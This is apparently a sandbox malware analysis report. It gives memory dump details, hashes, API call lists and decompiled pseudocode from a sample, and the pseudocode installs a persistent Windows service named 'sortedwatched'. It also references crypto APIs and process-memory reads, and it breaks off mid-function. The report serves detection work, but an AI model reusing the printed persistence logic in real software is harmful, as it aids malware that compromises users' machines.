                  • Opcode Fuzzy Hash: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction Fuzzy Hash: 0D9002BAA81421511A4177E30623D899D042B61B48344506FA0810041308491A14D53A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 404 492630-49263f call 491980 call 492600
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction ID: 5e82650c6a9ed5c9946a0bc66619120a7d3d2a9a79356ddf9cea7415fd05cdc4
                  • Opcode Fuzzy Hash: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction Fuzzy Hash: 25900279141005522A017FF70526B8958001B58748B88456BA14A4092359580810E83A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 419 4926b0-4926bf call 491980 call 492600
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction ID: 2badf0a5007c55508d044f9c2ab04f73481f446baff957defe6bfdf758e2acb7
                  • Opcode Fuzzy Hash: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction Fuzzy Hash: 8090027F641005520B0077E32972F8959445964798345406FE0055091359484810E43A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302663285.00470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_470000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  • Opcode ID: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction ID: 9daf2d2bec60aedefb9846b15a6faaae3990d0e08d8a8757adc2ea97cc9bab7b
                  • Opcode Fuzzy Hash: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction Fuzzy Hash: F992572090C7D9D9EB32C6788C587DDBEB11B27318F0841D9D1DC2A2D2C7BA1B85CB66
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00491A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00491C89
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"I
                  • API String ID: 204039940-169408306
                  • Opcode ID: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction ID: 7bbb646aaef758745ce5b3ce5ac1dadc49ec458156366565e970234bfd3f75b2
                  • Opcode Fuzzy Hash: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction Fuzzy Hash: 89A12C74E00209EBDF14CF94C994BEEBBB5BF48304F2085AAE105BB290D7796A41CB59
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 00491571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004915B4
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  • Opcode ID: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction ID: 40aac4f717aedba7d0d6e835892f7ddecd017a59ffb6f19a01f00a19f7dbcdae
                  • Opcode Fuzzy Hash: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction Fuzzy Hash: 75F15C74E00209EFDF14DF94C985FEEBBB5BF48304F20816AE615AB290C778A941DB58
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,003E0005), ref: 003E00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,003E0005), ref: 003E0113
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 295 491900-491978 call 4918f0 call 491000 call 491470 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 0049196E
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 492ad0-492ada 303 492afd 302->303 304 492adc-492ae7 IsWow64Process 302->304 305 492aff-492b01 303->305 306 492ae9-492aef 304->306 307 492af1 304->307 308 492af8-492afb 306->308 307->308 308->305
                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 00492AE2
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Non-executed Functions

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: P>
                  • API String ID: 2102423945-2683032675
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302663285.00470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_470000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_3e0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Execution Graph

                  Execution Coverage:30.9%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:13.5%
                  Total number of Nodes:497
                  Total number of Limit Nodes:3


                  Executed Functions

                  Control-flow Graph

                  C-Code - Quality: 80%
                  			E0040F7A0() {
                  				char _v8;
                  				short _v528;
                  				void* _t7;
                  				void* _t15;
                  				void* _t16;
                  				void* _t24;
                  				int _t32;
                  				void* _t33;
                  				void* _t35;
                  
                  				_t32 = 0;
                  				_v8 = 0;
                  				_t7 = OpenSCManagerW(0, 0, 0xf003f); // executed
                  				_t24 = _t7;
                  				if(_t24 != 0) {
                  					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
                  					 *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t33);
                  					L00401B09(_t34);
                  					_t15 = CreateServiceW(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0); // executed
                  					_t35 = _t15;
                  					if(_t35 != 0) {
                  						_t16 = E0040F504(_t24,  &_v8); // executed
                  						if(_t16 != 0) {
                  							 *0x41353c(_t35, 1, _v8);
                  							E00401532(_v8);
                  						}
                  					} else {
                  						_t35 = OpenServiceW(_t24, "sortedwatched", 0x10);
                  					}
                  					if(_t35 != 0) {
                  						_t32 = StartServiceW(_t35, _t32, _t32);
                  						CloseServiceHandle(_t35);
                  					}
                  					E0040F6D0(_t24);
                  					CloseServiceHandle(_t24);
                  				}
                  				return _t32;
                  			}













                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000104), ref: 0040F7B7
                  • _snwprintf.NTDLL ref: 0040F7EB
                  • CreateServiceW.ADVAPI32(00000000,sortedwatched,sortedwatched,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F816
                  • OpenServiceW.ADVAPI32(00000000,sortedwatched,00000010), ref: 0040F82A
                  • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,0040F111), ref: 0040F848
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040F85D
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F866
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F874
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 2587423728-1568575355
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 15%
                  			E0040F504(void* __ecx, intOrPtr* __edx) {
                  				char _v8;
                  				char _v12;
                  				signed int _v16;
                  				void* _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr* _v36;
                  				intOrPtr _t39;
                  				void* _t40;
                  				void* _t48;
                  				intOrPtr _t59;
                  				intOrPtr _t61;
                  				void* _t62;
                  				void* _t64;
                  				short** _t65;
                  
                  				_t62 = __ecx;
                  				_v36 = __edx;
                  				_v24 = __ecx;
                  				_push(0);
                  				_push(0);
                  				_t48 = 0;
                  				_push( &_v16);
                  				_push( &_v8);
                  				_push(0);
                  				_push(0);
                  				_push(3);
                  				_push(0x30);
                  				_push(0);
                  				_push(__ecx);
                  				if( *0x412fe8() != 0 || GetLastError() != 0xea) {
                  					L19:
                  					return _t48;
                  				} else {
                  					_t59 = E004014F2(_v8);
                  					_v32 = _t59;
                  					if(_t59 == 0) {
                  						L18:
                  						goto L19;
                  					}
                  					_push(0);
                  					_push(0);
                  					_push( &_v16);
                  					_push( &_v8);
                  					_push(_v8);
                  					_push(_t59);
                  					_push(3);
                  					_push(0x30);
                  					_push(0);
                  					_push(_t62);
                  					if( *0x412fe8() == 0) {
                  						_t61 = _v28;
                  						goto L16;
                  					} else {
                  						_t64 = (GetTickCount() & 0x0000000f) * 0x2c + _t59;
                  						_t39 = _v16 * 0x2c + _t64;
                  						_v28 = _t39;
                  						_t65 =  >=  ? _t59 : _t64;
                  						_t61 = _v28;
                  						while(_t65 < _t39) {
                  							_t40 = OpenServiceW(_v24,  *_t65, 1); // executed
                  							_v20 = _t40;
                  							if(_t40 == 0) {
                  								L13:
                  								_t39 = _v28;
                  								_t65 =  &(_t65[0xb]);
                  								if(_t48 == 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							_push( &_v12);
                  							_push(0);
                  							_push(0);
                  							_push(1);
                  							_push(_t40);
                  							if( *0x4135b4() == 0 && GetLastError() == 0x7a) {
                  								_t61 = E004014F2(_v12);
                  								if(_t61 != 0) {
                  									_t48 =  *0x4135b4(_v20, 1, _t61, _v12,  &_v12);
                  									if(_t48 == 0) {
                  										E00401532(_t61);
                  									}
                  								}
                  							}
                  							CloseServiceHandle(_v20);
                  							goto L13;
                  						}
                  						L16:
                  						E00401532(_v32);
                  						if(_t48 != 0) {
                  							 *_v36 = _t61;
                  						}
                  						goto L18;
                  					}
                  				}
                  			}




















                  APIs
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,0040F83E,?,00000000,00000000), ref: 0040F52A
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F538
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,0040F83E,0040F83E,?,00000000,00000000), ref: 0040F575
                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F583
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,0040F83E), ref: 0040F5AD
                  • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5C5
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F5CF
                  • QueryServiceConfig2W.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5F5
                    • Part of subcall function 00401532: GetProcessHeap.KERNEL32(00000000,?,0040F628,?,?,?,?,?,?,?,0040F83E), ref: 00401535
                    • Part of subcall function 00401532: HeapFree.KERNEL32(00000000), ref: 0040153C
                  • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,0040F83E), ref: 0040F60B
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: HeapService$Config2EnumErrorLastProcessQueryServicesStatus$AllocateCloseCountFreeHandleOpenTick
                  • String ID:
                  • API String ID: 2166652104-0
                  • Opcode ID: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction ID: fb962817b9f77482ee3899ed83bed23c765ea0bda143a25e94a62ef856afa488
                  • Opcode Fuzzy Hash: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction Fuzzy Hash: 4E418071A00105BFDB259FA5DC86EEFBBB9EF44700F10013AF901F62A0DA759E068B58
                  Uniqueness

                  Uniqueness Score: 0.19%

                  C-Code - Quality: 42%
                  			E0040F7A0() {
                  				char _v8;
                  				short _v528;
                  				void* _t7;
                  				void* _t15;
                  				void* _t16;
                  				int _t19;
                  				void* _t24;
                  				int _t32;
                  				void* _t33;
                  				void* _t35;
                  
                  				_t32 = 0;
                  				_v8 = 0;
                  				_t7 = OpenSCManagerW(0, 0, 0xf003f); // executed
                  				_t24 = _t7;
                  				if(_t24 != 0) {
                  					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
                  					 *0x4143a4( &_v528, 0x104, _t9, 0x416840, _t33);
                  					L00401B09(_t34);
                  					_t15 = CreateServiceW(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0); // executed
                  					_t35 = _t15;
                  					if(_t35 != 0) {
                  						_t16 = E0040F504(_t24,  &_v8); // executed
                  						if(_t16 != 0) {
                  							 *0x41353c(_t35, 1, _v8);
                  							E00401532(_v8);
                  						}
                  					} else {
                  						_t35 =  *0x413594(_t24, 0x416530, 0x10);
                  					}
                  					if(_t35 != 0) {
                  						_t19 =  *0x41315c(_t35, _t32, _t32);
                  						_t32 = _t19;
                  						 *0x4135a4(_t35);
                  					}
                  					E0040F6D0(_t24);
                  					 *0x4135a4(_t24);
                  				}
                  				return _t32;
                  			}














                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000104), ref: 0040F7B7
                  • _snwprintf.NTDLL ref: 0040F7EB
                  • CreateServiceW.ADVAPI32(00000000,00416530,00416530,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F816
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateManagerOpenService_snwprintf
                  • String ID: 0eA$g8Cw
                  • API String ID: 2040870185-1352154256
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 83%
                  			E004076C6(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
